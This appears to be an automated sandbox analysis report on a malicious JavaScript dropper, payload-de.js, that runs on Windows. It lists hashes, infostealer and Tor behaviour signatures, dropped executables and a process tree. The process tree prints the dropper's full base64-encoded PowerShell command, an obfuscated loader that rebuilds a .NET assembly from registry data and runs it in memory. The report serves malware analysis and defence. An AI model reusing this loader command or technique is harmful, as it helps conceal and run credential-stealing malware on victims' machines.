Analysis

  • max time kernel
    150s
  • max time network
    136s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    02-03-2021 16:06

General

  • Target

    payload-de.js

  • Size

    2.8MB

  • MD5

    6f1069a90a63748bdb3098301993b38b

  • SHA1

    547d848aa7044051ac69c4004069d03b38a25c15

  • SHA256

    4282eb3d9f7aad6faf333be7700b1926dfac7b1827515706db6a29b40a6cdb45

  • SHA512

    ccf12209455b03ed526c7d05f49463f7532daaec294e861724173de05433d031e9a12f4ca82f05e10ddc50322fa8db76fd5853591f6a80c03ec2a27595185434

Malware Config

Signatures

  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Uses Tor communications 1 TTPs

    Malware can proxy its traffic through Tor for more anonymity.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\payload-de.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:672
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdABzAGUAbQBhAG0AdwBiAHcAawBrAG8AawBlAGIAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:184
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdABzAGUAbQBhAG0AdwBiAHcAawBrAG8AawBlAGIAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3360
        • C:\Users\Admin\AppData\Roaming\Admin.exe
          "C:\Users\Admin\AppData\Roaming\Admin.exe"
          4⤵
          • Executes dropped EXE
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3960
          • C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
            "C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"
            5⤵
            • Executes dropped EXE
            PID:1780
          • C:\Users\Admin\AppData\Local\Temp\{AA04D31D-0384-4767-A455-223C4B3C564D}\1577599147.exe
            "1577599147.exe"
            5⤵
            • Executes dropped EXE
            PID:776

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
    MD5

    b4cd27f2b37665f51eb9fe685ec1d373

    SHA1

    7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

    SHA256

    91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

    SHA512

    e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

  • C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
    MD5

    b4cd27f2b37665f51eb9fe685ec1d373

    SHA1

    7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

    SHA256

    91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

    SHA512

    e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

  • C:\Users\Admin\AppData\Local\Temp\x64btit.txt
    MD5

    e66e746f849f7abbcdae47bb95507d20

    SHA1

    24ae1f68f97c2e58a7ade40b0223b46e87b94077

    SHA256

    080a258cf8f83417af114097d40367eaae83ef8bf5113e3597a2b600b1788351

    SHA512

    82bfcf11b48c1de0772781795636a46b7c57afa62cf7dad37e48463851800526a0521e393dd5f09996a12c6e4be785db0b933e0d4eb82223aeae697634ac3966

  • C:\Users\Admin\AppData\Local\Temp\{AA04D31D-0384-4767-A455-223C4B3C564D}\1577599147.exe
    MD5

    9f385a9a69a4d9e18055743f0694976b

    SHA1

    2c2385ea964a33f803e96e364d4a05771c733921

    SHA256

    45f175bc165a3f8d9a05da48bdc4c1f234386588e0d003df094f72d019ae6216

    SHA512

    e9e78eb02bad22815648723138a7443da527779644ad9f9e776f91ba796b255c7556c5fe82ea526825c23ea376ed90d4dd5f31b026d2ff00605d8db9b0729c3c

  • C:\Users\Admin\AppData\Local\Temp\{AA04D31D-0384-4767-A455-223C4B3C564D}\1577599147.exe
    MD5

    9f385a9a69a4d9e18055743f0694976b

    SHA1

    2c2385ea964a33f803e96e364d4a05771c733921

    SHA256

    45f175bc165a3f8d9a05da48bdc4c1f234386588e0d003df094f72d019ae6216

    SHA512

    e9e78eb02bad22815648723138a7443da527779644ad9f9e776f91ba796b255c7556c5fe82ea526825c23ea376ed90d4dd5f31b026d2ff00605d8db9b0729c3c

  • C:\Users\Admin\AppData\Roaming\Admin.exe
    MD5

    4db1ee663bd9f021da04edca144f4bd7

    SHA1

    709d318281ceabef246af0107b1db12f237b793a

    SHA256

    3002d2fc90595dd4688518b300323aaf26d4ae09cb33b2b580cbec41b43d8eb6

    SHA512

    ec3b1615e1751fad8cf4f6b6cf8739d972ab7aa4d23a84167e159f15b4842bc3ec09bb4b4daf31570e0d88d466e0a4c5eac16f97169dfb020c5758ce568ce565

  • C:\Users\Admin\AppData\Roaming\Admin.exe
    MD5

    4db1ee663bd9f021da04edca144f4bd7

    SHA1

    709d318281ceabef246af0107b1db12f237b793a

    SHA256

    3002d2fc90595dd4688518b300323aaf26d4ae09cb33b2b580cbec41b43d8eb6

    SHA512

    ec3b1615e1751fad8cf4f6b6cf8739d972ab7aa4d23a84167e159f15b4842bc3ec09bb4b4daf31570e0d88d466e0a4c5eac16f97169dfb020c5758ce568ce565

  • memory/184-3-0x0000000000000000-mapping.dmp
  • memory/672-2-0x0000022D7C820000-0x0000022D7C927000-memory.dmp
    Filesize

    1.0MB

  • memory/776-33-0x0000000000000000-mapping.dmp
  • memory/1780-29-0x0000000000000000-mapping.dmp
  • memory/3360-10-0x0000000007560000-0x0000000007561000-memory.dmp
    Filesize

    4KB

  • memory/3360-11-0x0000000007D50000-0x0000000007D51000-memory.dmp
    Filesize

    4KB

  • memory/3360-15-0x0000000008790000-0x0000000008791000-memory.dmp
    Filesize

    4KB

  • memory/3360-16-0x0000000008700000-0x0000000008701000-memory.dmp
    Filesize

    4KB

  • memory/3360-17-0x0000000009760000-0x0000000009761000-memory.dmp
    Filesize

    4KB

  • memory/3360-18-0x0000000009470000-0x0000000009471000-memory.dmp
    Filesize

    4KB

  • memory/3360-19-0x00000000096C0000-0x00000000096C1000-memory.dmp
    Filesize

    4KB

  • memory/3360-20-0x0000000009D00000-0x0000000009D01000-memory.dmp
    Filesize

    4KB

  • memory/3360-21-0x0000000009870000-0x0000000009872000-memory.dmp
    Filesize

    8KB

  • memory/3360-22-0x00000000099B0000-0x0000000009B23000-memory.dmp
    Filesize

    1.4MB

  • memory/3360-4-0x0000000000000000-mapping.dmp
  • memory/3360-5-0x0000000074000000-0x00000000746EE000-memory.dmp
    Filesize

    6.9MB

  • memory/3360-13-0x0000000008010000-0x0000000008011000-memory.dmp
    Filesize

    4KB

  • memory/3360-12-0x0000000007DC0000-0x0000000007DC1000-memory.dmp
    Filesize

    4KB

  • memory/3360-6-0x0000000006F70000-0x0000000006F71000-memory.dmp
    Filesize

    4KB

  • memory/3360-7-0x0000000007630000-0x0000000007631000-memory.dmp
    Filesize

    4KB

  • memory/3360-14-0x0000000007EA0000-0x0000000007EA1000-memory.dmp
    Filesize

    4KB

  • memory/3360-9-0x0000000006FF2000-0x0000000006FF3000-memory.dmp
    Filesize

    4KB

  • memory/3360-8-0x0000000006FF0000-0x0000000006FF1000-memory.dmp
    Filesize

    4KB

  • memory/3960-27-0x0000000000400000-0x0000000000456000-memory.dmp
    Filesize

    344KB

  • memory/3960-28-0x00000000006C0000-0x000000000075F000-memory.dmp
    Filesize

    636KB

  • memory/3960-24-0x0000000000401698-mapping.dmp
  • memory/3960-23-0x0000000000400000-0x0000000000456000-memory.dmp
    Filesize

    344KB